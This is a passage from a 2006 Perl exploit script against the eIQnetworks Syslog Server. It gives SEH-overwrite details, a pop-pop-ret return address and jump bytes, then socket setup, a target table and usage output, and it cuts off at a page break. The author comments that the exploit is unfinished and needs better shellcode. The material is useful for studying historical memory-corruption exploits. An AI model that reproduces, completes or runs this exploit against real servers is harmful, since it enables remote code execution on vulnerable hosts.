1 #!/usr/bin/perl −w
2 #
3 # http://www.digitalmunition.com
4 # written by kf (kf_lists[at]digitalmunition[dot]com) − 03/23/2006
5 # Bug found by KF of digitalmunition.com.
6 #
7 # http://www.zerodayinitiative.com/advisories/ZDI−06−023.html
8 #
9 # Exploit for * Syslog Server by eiQnetworks (OEM for Several vendors)
10 #
11 # There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by defau
lt
12 #
13 # Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style j
mp instead of a
14 # forward jump. This would eliminate the need for 2 stages of shellcode. .
15 #
16 #SEH chain of thread 00000FF4
17 #Address SE handler
18 #013ECEF8 FWASyslo.00449EDB
19 #013EFF78 WS2HELP.71AA15CF <−−−−−−−− I set this address.
20 #
21 #013EFF74 90909090
22 #013EFF78 909032EB Pointer to next SEH record <−−− I set this.
23 #013EFF7C 71AA15CF SE handler <−−− pop pop ret
24 #013EFF80 90909090
25 #
26 #71AA15CF 5F POP EDI
27 #71AA15D0 5D POP EBP
28 #71AA15D1 C2 0800 RETN 8
29 #
30 # View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
31 #
32 use IO::Socket;
33
34 $bufsize = 4096;
35
36 $hostname = "127.0.0.1";
37 $nextserec = pack("l", (0xEB069090)); # jmp short +0x06
38 $sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn − ws2help.dll (Send this reversed note the ’V’)
39
40 # Binary hunts performed by JxT and Titon
41 $tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite.
42
43 unless (($target,$hostname) = @ARGV,$hostname) {
44
45 print "\n Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) − 03/23/2006\n";
46 print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";
47
48 foreach $key (sort(keys %tgts)) {
49 ($a,$b) = split(/\:/,$tgts{"$key"});
50 print "\t$key . $a\n";
Page 1/3
eIQnetworks ES